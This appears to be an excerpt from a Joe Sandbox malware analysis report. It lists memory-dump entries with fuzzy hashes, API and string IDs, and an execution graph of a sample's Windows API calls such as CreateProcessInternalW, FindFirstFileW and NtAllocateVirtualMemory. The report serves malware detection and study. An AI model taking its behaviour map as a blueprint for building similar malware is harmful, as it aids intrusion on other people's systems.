                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                  • API String ID: 885266447-605551621
                                                  • Opcode ID: faae03c02c7d9370f3876087403c19c58ae2f81b1d2bbf3259db106efbc6613e
                                                  • Instruction ID: 0f29b3f8773ed9549f7ea2d9164431d47361533e254c7a80800fab7aa24c5af6
                                                  • Opcode Fuzzy Hash: faae03c02c7d9370f3876087403c19c58ae2f81b1d2bbf3259db106efbc6613e
                                                  • Instruction Fuzzy Hash: 5C41F03D700246ABD720DE29CC41B6AB7A9FF94718F244619F95AEB240DB31E846CBD1
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: %%%u$]:%u
                                                  • API String ID: 48624451-3050659472
                                                  • Opcode ID: 9a4a5fc963a18a19278df34e03e3ba48cfed910c71f3e17db0914c757d046b7a
                                                  • Instruction ID: 1f071c9d8e0bebf8766d89ca0242dfbf2033addeed353c1077271ce1a3d1302d
                                                  • Opcode Fuzzy Hash: 9a4a5fc963a18a19278df34e03e3ba48cfed910c71f3e17db0914c757d046b7a
                                                  • Instruction Fuzzy Hash: DE315476A0021D9FDB20DF29CC94BEEB7FDEB44614F544555EC49E3280EB309A458FA1
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID: __aulldvrm
                                                  • String ID: +$-
                                                  • API String ID: 1302938615-2137968064
                                                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                  • Instruction ID: ca0421d34761d31b92ee04f1aa2567320b7bac7c770d1b7beb8b08d87817fc08
                                                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                  • Instruction Fuzzy Hash: 619192BCE1021A9EDF24DE69C8817BEF7A5AF44724F1C461AE859EB6C0E7309940CB51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2820000_RegAsm.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $$@
                                                  • API String ID: 0-1194432280
                                                  • Opcode ID: 34c1973263fb776393b44b02a76c6fa28f3ffb7519368d1d14181ec595c9f7e2
                                                  • Instruction ID: d4ed3dbdc21577f509c9d35df9195418ff4976377fe61ec7c9767ec8de100214
                                                  • Opcode Fuzzy Hash: 34c1973263fb776393b44b02a76c6fa28f3ffb7519368d1d14181ec595c9f7e2
                                                  • Instruction Fuzzy Hash: 1F810AB9D402699BDB268B54CC44BEEB6B8AF49754F0041DAEA1DF7240D7309E84CFA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: X$#$$g$)y$6f$7>$9$9z$I$OY$]'$_:$$
                                                  • API String ID: 0-1456910488
                                                  • Opcode ID: d68637827661577542a4a293dd6c73c7b465c7517858e60462967384838a17c7
                                                  • Instruction ID: dbb9019ec41dc01966afde0eaff785dd35302dc5d5d69c9feb2cea0f88a0f5a6
                                                  • Opcode Fuzzy Hash: d68637827661577542a4a293dd6c73c7b465c7517858e60462967384838a17c7
                                                  • Instruction Fuzzy Hash: 5122D1B8E05269CFDB24CF48C9947DDBBB1BF85308F2481D9D149AB281C7B59A86CF41
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 6$O$S$\$s
                                                  • API String ID: 0-3854637164
                                                  • Opcode ID: a9c1c934cea71200e13a4ac6e07a757bd777cbdaac0b6ce278ceae7c9551d13d
                                                  • Instruction ID: 98131689aec66b4ec5aa627430a7ecc7575534bc97a1c703c314fcdc8cf7c9f5
                                                  • Opcode Fuzzy Hash: a9c1c934cea71200e13a4ac6e07a757bd777cbdaac0b6ce278ceae7c9551d13d
                                                  • Instruction Fuzzy Hash: E85183BA900218AADF10EF99DD88BEEB379EF44714F048199ED0D97100E7755A58CFA2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ~P
                                                  • API String ID: 0-2601391987
                                                  • Opcode ID: 8bb546077eac862019745f391fb40bccae899c441ae38dac4d60f0b046aeef6a
                                                  • Instruction ID: 75f604d6b71aa0cf1e5f018f952aa2a36619ad4b5989362a7bb79007a29c646c
                                                  • Opcode Fuzzy Hash: 8bb546077eac862019745f391fb40bccae899c441ae38dac4d60f0b046aeef6a
                                                  • Instruction Fuzzy Hash: 2921F1B6D0121CAF8B04DFA9D9419EFB7F9EF88200F10455AE919E7200E7759A14CFE1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Ok
                                                  • API String ID: 0-3965254117
                                                  • Opcode ID: a91e6bb513452a9a8d83d0aa560c473b02efa44b7ad7666c4ff0e1a811d56664
                                                  • Instruction ID: 4d4cf9d013ce1cd1396babbff0b69b44b34e09a04d8e20fd0e43b98c441e5fd5
                                                  • Opcode Fuzzy Hash: a91e6bb513452a9a8d83d0aa560c473b02efa44b7ad7666c4ff0e1a811d56664
                                                  • Instruction Fuzzy Hash: BC011BB6C01218AF8F41DFE8D9449EEBBF9AB08300F14816EE519F3200E77056048FA1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 21106eb5ceeca8892c75dbebf12ee49aa38b3bdb6838568f2f96fd6c839bc806
                                                  • Instruction ID: 2d46ea765b0133e9c0a787eead2ef067876a8365212ff34d864bee53671c49ae
                                                  • Opcode Fuzzy Hash: 21106eb5ceeca8892c75dbebf12ee49aa38b3bdb6838568f2f96fd6c839bc806
                                                  • Instruction Fuzzy Hash: BD114C79A00748ABDB14EB58CC45FBF73A9EF85704F104509FA199B280E7746901CBA5
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 92c9041de972db01f374b8b10d72fc79274d392b9dfbfa6944faa41ed44dca7b
                                                  • Instruction ID: 40ab7bba09822469acbfda0418d30276ad49820fa80193a25b7ebfef2d5fb584
                                                  • Opcode Fuzzy Hash: 92c9041de972db01f374b8b10d72fc79274d392b9dfbfa6944faa41ed44dca7b
                                                  • Instruction Fuzzy Hash: 691160799003586BDB14EB58CC45FFFB7A9EF86704F00440DFA59AB280E7746900CBA5
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f660786144a0dcc073b6e3cdd037f0496482bee28493ab4739367fe7d3f80def
                                                  • Instruction ID: 4500cb32040f64c9c841b972ac34a21c1c781a4c42c50afd197554b7edd8f0d8
                                                  • Opcode Fuzzy Hash: f660786144a0dcc073b6e3cdd037f0496482bee28493ab4739367fe7d3f80def
                                                  • Instruction Fuzzy Hash: E8111FB6D0121CAF8B00DFA9D8419EEB7F9FF48200F14456EE919E7240E7719A14CFA1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 66b926dc92124afd770d4fb538d12e6d1c9040ff0f8efd374a8c126eb438ebd8
                                                  • Instruction ID: 3c86e528b468d927fd212c81fda90e52426e061c976267587d5a3eaa69003456
                                                  • Opcode Fuzzy Hash: 66b926dc92124afd770d4fb538d12e6d1c9040ff0f8efd374a8c126eb438ebd8
                                                  • Instruction Fuzzy Hash: 000180B6214248BBCB44DF99DC80EEB77ADAF8D714F108609FA09E3240D630E8518BA5
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5e9ef3e428d3292fef6c869e9766185cd0cca7d3c40a508152325a55f4f45e2b
                                                  • Instruction ID: 7f06e6cdc43e488b87580ad22726036f5627870db508507e2764f392b2f6cd9f
                                                  • Opcode Fuzzy Hash: 5e9ef3e428d3292fef6c869e9766185cd0cca7d3c40a508152325a55f4f45e2b
                                                  • Instruction Fuzzy Hash: CAF096BB1142566BD7105F6DEC44BCAFB9CEF85224F140266F95CCA242D671945287A0
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 65c45e4c7be51f0fd74b90ce967a54676480fc732c59fb5c884ddb3dc31b6b8e
                                                  • Instruction ID: 5a4f77e3002f5adbe5f37005d46fdd9ed6c19313f852d90d0f9fbe1d150a3f68
                                                  • Opcode Fuzzy Hash: 65c45e4c7be51f0fd74b90ce967a54676480fc732c59fb5c884ddb3dc31b6b8e
                                                  • Instruction Fuzzy Hash: 61F0F879200209BBCB10EE99DC41EAB77ADEF89714F108419FA1897241D670B9118BB1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: be7aa4d2da4b7067a596c9035d0bc30d2e7398eb739ff6c306a7e651a1f43883
                                                  • Instruction ID: cb28113d7902d757265700f9af99472d5bf898127cedc0e7dda1c5c66877de79
                                                  • Opcode Fuzzy Hash: be7aa4d2da4b7067a596c9035d0bc30d2e7398eb739ff6c306a7e651a1f43883
                                                  • Instruction Fuzzy Hash: F9F05E75805208ABDF28DF64D841BDDBBB4EF04320F108369E829DB280D63497548B81
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c88b1a0bb204b57714c7453da61102d5602c15304a95a44d83d0ecd5ecf1501f
                                                  • Instruction ID: 57dc7407882084ab1e30cbb9c8500f60113c0bac5402715aa2929470fc90cca0
                                                  • Opcode Fuzzy Hash: c88b1a0bb204b57714c7453da61102d5602c15304a95a44d83d0ecd5ecf1501f
                                                  • Instruction Fuzzy Hash: 6EE06D792002487BDA14EE98DC84EEB77ADEF8A710F004809F909A7241D731B8118AB5
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dd79e2027c0dc6931a36b6f52d4c4b335389933d294c5190db9e905ddae655ce
                                                  • Instruction ID: 3a527ce25638762d10a78951747a6f32cd62b79638eb38de78d7f70956d7a965
                                                  • Opcode Fuzzy Hash: dd79e2027c0dc6931a36b6f52d4c4b335389933d294c5190db9e905ddae655ce
                                                  • Instruction Fuzzy Hash: 51E0203E60021033D920694D4C05F97735CDFD2F61F050024FE0DDB310D560ED0042E5
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4d01af7a7d738745b7d0c40722cbfdbdbc250f8d3261de578766de33a0c527b8
                                                  • Instruction ID: 35a229f7c9f9eda5496572c4560417c8bb01516c1f3bb16fe05af8040cd0bedb
                                                  • Opcode Fuzzy Hash: 4d01af7a7d738745b7d0c40722cbfdbdbc250f8d3261de578766de33a0c527b8
                                                  • Instruction Fuzzy Hash: 79E08C3A2002447BDA20FB69CC41FEBB76DDFCA724F104819FA08A7241C771B9018BB1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_25f0000_ZrTbKDhAWYKJu.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7215c5814a26de82221d08df1b2690ef9f4f7d0dda47b8b762d3890cb1fc3533
                                                  • Instruction ID: b5134148ac7c642373983c17d329a4f6568591d8ec01de2be165da1bf6710606
                                                  • Opcode Fuzzy Hash: 7215c5814a26de82221d08df1b2690ef9f4f7d0dda47b8b762d3890cb1fc3533
                                                  • Instruction Fuzzy Hash: F5C02230128282AFC208BB649D8059A7F52AD1223038C8768A830416C7CB11E444DA85

                                                  Execution Graph

                                                  Execution Coverage:2.6%
                                                  Dynamic/Decrypted Code Coverage:4.3%
                                                  Signature Coverage:2.3%
                                                  Total number of Nodes:442
                                                  Total number of Limit Nodes:71
99392->99390 99394 2f2857d 99393->99394 99395 2f285a5 99394->99395 99396 2f2859e SetErrorMode 99394->99396 99395->99380 99396->99395 99398 2f3b990 NtAllocateVirtualMemory 99397->99398 99399 2f315b1 99398->99399 99399->99384 99401 2f3cad0 99400->99401 99402 2f3cad6 99400->99402 99401->99383 99403 2f3bb00 RtlAllocateHeap 99402->99403 99404 2f3cafc 99403->99404 99404->99383 99406 2f3cb60 99405->99406 99407 2f3cbbd 99406->99407 99408 2f3bb00 RtlAllocateHeap 99406->99408 99407->99387 99409 2f3cb9a 99408->99409 99410 2f3ba20 RtlFreeHeap 99409->99410 99410->99407 99412 2f20c4a 99411->99412 99419 2f39bf0 99412->99419 99416 2f28523 99415->99416 99424 2f38e80 99416->99424 99418 2f2854e 99418->99389 99420 2f39c0a 99419->99420 99423 3a02c70 LdrInitializeThunk 99420->99423 99421 2f20c52 99421->99392 99423->99421 99425 2f38efe 99424->99425 99426 2f38eab 99424->99426 99429 3a02dd0 LdrInitializeThunk 99425->99429 99426->99418 99427 2f38f23 99427->99418 99429->99427 99430 2f2ca10 99431 2f2ca39 99430->99431 99432 2f2cb3d 99431->99432 99433 2f2cae3 FindFirstFileW 99431->99433 99433->99432 99435 2f2cafe 99433->99435 99434 2f2cb24 FindNextFileW 99434->99435 99436 2f2cb36 FindClose 99434->99436 99435->99434 99436->99432 99437 2f25fd0 99438 2f28510 LdrInitializeThunk 99437->99438 99439 2f26000 99438->99439 99441 2f2602c 99439->99441 99442 2f28490 99439->99442 99443 2f284d4 99442->99443 99444 2f284f5 99443->99444 99449 2f38c50 99443->99449 99444->99439 99446 2f284e5 99447 2f28501 99446->99447 99448 2f39960 NtClose 99446->99448 99447->99439 99448->99444 99450 2f38ccd 99449->99450 99452 2f38c7b 99449->99452 99454 3a04650 LdrInitializeThunk 99450->99454 99451 2f38cf2 99451->99446 99452->99446 99454->99451 99455 2f21190 99456 2f211aa 99455->99456 99457 2f24960 LdrLoadDll 99456->99457 99458 2f211c8 99457->99458 99459 2f2120d 99458->99459 99460 2f211fc PostThreadMessageW 99458->99460 99460->99459 99466 2f31bd0 99467 2f31bec 99466->99467 99468 2f31c14 99467->99468 99469 2f31c28 99467->99469 
99470 2f39960 NtClose 99468->99470 99471 2f39960 NtClose 99469->99471 99472 2f31c1d 99470->99472 99473 2f31c31 99471->99473 99476 2f3bb40 RtlAllocateHeap 99473->99476 99475 2f31c3c 99476->99475 99487 2f2779b 99488 2f2779f 99487->99488 99489 2f2776d 99487->99489 99490 2f27792 99489->99490 99492 2f2b6a0 99489->99492 99493 2f2b6c6 99492->99493 99494 2f2b8f9 99493->99494 99519 2f39d70 99493->99519 99494->99490 99496 2f2b73c 99496->99494 99497 2f3cbf0 2 API calls 99496->99497 99498 2f2b75b 99497->99498 99498->99494 99499 2f2b832 99498->99499 99500 2f38f80 LdrInitializeThunk 99498->99500 99501 2f25f50 LdrInitializeThunk 99499->99501 99503 2f2b851 99499->99503 99502 2f2b7bd 99500->99502 99501->99503 99502->99499 99505 2f2b7c6 99502->99505 99518 2f2b8e1 99503->99518 99525 2f38af0 99503->99525 99504 2f28510 LdrInitializeThunk 99506 2f2b828 99504->99506 99505->99494 99512 2f2b7f8 99505->99512 99514 2f2b81a 99505->99514 99522 2f25f50 99505->99522 99506->99490 99507 2f28510 LdrInitializeThunk 99511 2f2b8ef 99507->99511 99511->99490 99540 2f34c00 LdrInitializeThunk 99512->99540 99513 2f2b8b8 99530 2f38ba0 99513->99530 99514->99504 99516 2f2b8d2 99535 2f38d00 99516->99535 99518->99507 99520 2f39d8d 99519->99520 99521 2f39d9e CreateProcessInternalW 99520->99521 99521->99496 99523 2f39150 LdrInitializeThunk 99522->99523 99524 2f25f8e 99523->99524 99524->99512 99526 2f38b6d 99525->99526 99527 2f38b1b 99525->99527 99541 3a039b0 LdrInitializeThunk 99526->99541 99527->99513 99528 2f38b92 99528->99513 99531 2f38c20 99530->99531 99533 2f38bce 99530->99533 99542 3a04340 LdrInitializeThunk 99531->99542 99532 2f38c45 99532->99516 99533->99516 99536 2f38d80 99535->99536 99537 2f38d2e 99535->99537 99543 3a02fb0 LdrInitializeThunk 99536->99543 99537->99518 99538 2f38da5 99538->99518 99540->99514 99541->99528 99542->99532 99543->99538 99544 3a02ad0 LdrInitializeThunk 99545 2f2fc80 99546 2f2fce4 99545->99546 99574 2f266d0 99546->99574 99548 2f2fe1e 99549 2f2fe17 99549->99548 99581 2f267e0 
99549->99581 99551 2f2fe9a 99552 2f2ffd2 99551->99552 99572 2f2ffc3 99551->99572 99585 2f2fa60 99551->99585 99553 2f39960 NtClose 99552->99553 99555 2f2ffdc 99553->99555 99556 2f2fed6 99556->99552 99557 2f2fee1 99556->99557 99558 2f3bb00 RtlAllocateHeap 99557->99558 99559 2f2ff0a 99558->99559 99560 2f2ff13 99559->99560 99561 2f2ff29 99559->99561 99562 2f39960 NtClose 99560->99562 99594 2f2f950 CoInitialize 99561->99594 99564 2f2ff1d 99562->99564 99565 2f2ff37 99597 2f39400 99565->99597 99567 2f2ffb2 99568 2f39960 NtClose 99567->99568 99569 2f2ffbc 99568->99569 99570 2f3ba20 RtlFreeHeap 99569->99570 99570->99572 99571 2f2ff55 99571->99567 99573 2f39400 LdrInitializeThunk 99571->99573 99573->99571 99575 2f26703 99574->99575 99576 2f26727 99575->99576 99601 2f394a0 99575->99601 99576->99549 99578 2f2674a 99578->99576 99579 2f39960 NtClose 99578->99579 99580 2f267ca 99579->99580 99580->99549 99582 2f26805 99581->99582 99606 2f39290 99582->99606 99586 2f2fa7c 99585->99586 99587 2f24960 LdrLoadDll 99586->99587 99589 2f2fa9a 99587->99589 99588 2f2faa3 99588->99556 99589->99588 99590 2f24960 LdrLoadDll 99589->99590 99591 2f2fb6e 99590->99591 99592 2f24960 LdrLoadDll 99591->99592 99593 2f2fbcb 99591->99593 99592->99593 99593->99556 99596 2f2f9b5 99594->99596 99595 2f2fa4b CoUninitialize 99595->99565 99596->99595 99598 2f3941a 99597->99598 99611 3a02ba0 LdrInitializeThunk 99598->99611 99599 2f3944a 99599->99571 99602 2f394ba 99601->99602 99605 3a02ca0 LdrInitializeThunk 99602->99605 99603 2f394e6 99603->99578 99605->99603 99607 2f392aa 99606->99607 99610 3a02c60 LdrInitializeThunk 99607->99610 99608 2f26879 99608->99551 99610->99608 99611->99599 99612 2f27540 99613 2f2755c 99612->99613 99621 2f275af 99612->99621 99615 2f39960 NtClose 99613->99615 99613->99621 99614 2f276e7 99616 2f27577 99615->99616 99622 2f26960 NtClose LdrInitializeThunk LdrInitializeThunk 99616->99622 99618 2f276c1 99618->99614 99624 2f26b30 NtClose LdrInitializeThunk LdrInitializeThunk 99618->99624 
99621->99614 99623 2f26960 NtClose LdrInitializeThunk LdrInitializeThunk 99621->99623 99622->99621 99623->99618 99624->99614 99625 2f39640 99626 2f396fa 99625->99626 99627 2f39672 99625->99627 99628 2f39710 NtCreateFile 99626->99628 99629 2f30580 99630 2f3059d 99629->99630 99631 2f24960 LdrLoadDll 99630->99631 99632 2f305bb 99631->99632 99633 2f22b88 99634 2f266d0 2 API calls 99633->99634 99635 2f22bb3 99634->99635 99636 2f2350c 99637 2f28190 2 API calls 99636->99637 99638 2f2351c 99637->99638 99639 2f39960 NtClose 99638->99639 99640 2f23538 99638->99640 99639->99640

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: <$ [$!c$#f$$$($-O-T$-T$56$Ds$Fb$M8$MS$N$NV$P8$PC$Q$QO$R$[$^$a"$aq$b$bt$bt$cb$e$e\$e]$h$n$vi$x$$z@$}$I$t
                                                  • API String ID: 0-295432161
                                                  • Opcode ID: fff98a8453f5bdfa6d36316d500ec993694e478ddce5d1cb247a2e85857491aa
                                                  • Instruction ID: 56c630bed80f2626d67ae9d1fee989b0ade6d5c024aafb1eafd51cbd02645bfe
                                                  • Opcode Fuzzy Hash: fff98a8453f5bdfa6d36316d500ec993694e478ddce5d1cb247a2e85857491aa
                                                  • Instruction Fuzzy Hash: BE429DB0D06229CBEB25CF44C9A8BDDBBB2BB45348F5081D9C54D6B281C7B95AC9CF40
                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 02F2CAF4
                                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 02F2CB2F
                                                  • FindClose.KERNELBASE(?), ref: 02F2CB3A
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNext
                                                  • String ID:
                                                  • API String ID: 3541575487-0
                                                  • Opcode ID: 6b2015aa91fc6e1246276bdd291c7b490f7059428ee964901ea5b36ba32bc516
                                                  • Instruction ID: 403bcd981f8141144f85474c33a149bdd7c5a30855f8af378a0b48739aa59b95
                                                  • Opcode Fuzzy Hash: 6b2015aa91fc6e1246276bdd291c7b490f7059428ee964901ea5b36ba32bc516
                                                  • Instruction Fuzzy Hash: 3E3194B1A0021CBBDB20DF60CC85FEF777D9F85784F144559FA09A7180D774AA898BA0
                                                  APIs
                                                  • NtCreateFile.NTDLL(?,?,?,?,B91DC9C4,?,?,?,?,?,?), ref: 02F39741
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 5a38ad85594f6784711b9de879168fc1a737e229a98eecd9b68a90cf89a392c6
                                                  • Instruction ID: 84e3237af886c8fd4899654ec9cf7dd6df344cd0e590e0e06f4560aaf15ee76a
                                                  • Opcode Fuzzy Hash: 5a38ad85594f6784711b9de879168fc1a737e229a98eecd9b68a90cf89a392c6
                                                  • Instruction Fuzzy Hash: 8531A4B5A00648AFCB14DF99D881EEF77F9AF89714F108219FA19A7240D730A911CBA4
                                                  APIs
                                                  • NtReadFile.NTDLL(?,?,?,?,B91DC9C4,?,?,?,?), ref: 02F39899
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: fb8bfa857bb19e2076a26ef0ef5f60faf9986c093b506c2ac0c840562c3eae42
                                                  • Instruction ID: 10877250815f6a2006b27b8687d4410dbc035178b7b1f96f2ce6c9f5af828938
                                                  • Opcode Fuzzy Hash: fb8bfa857bb19e2076a26ef0ef5f60faf9986c093b506c2ac0c840562c3eae42
                                                  • Instruction Fuzzy Hash: 4631D8B5A00648AFDB14DF99DC41EEF77F9EF89314F108219FA19A7240D770A9118FA4
                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(02F2218E,?,02F3842F,00000000,B91DC9C4,00003000,?,?,?,?,?,02F3842F,02F2218E), ref: 02F39B8B
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2f10000_sc.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: 70e5b60fea7e4116acc03c30de9bd4b5fe89e03f9668c6c9b172b87332503acd
                                                  • Instruction ID: 599c952c99ee522dada7d32650df30f14eb15fdb502a04887f0f7fc1a31c28f0
                                                  • Opcode Fuzzy Hash: 70e5b60fea7e4116acc03c30de9bd4b5fe89e03f9668c6c9b172b87332503acd
                                                  • Instruction Fuzzy Hash: EE2119B5A00249ABDB14DF98DC41FEFB7B9EF89704F108109FE19AB240D774A9118BA5
                                                  APIs
                                                  Memory Dump Source
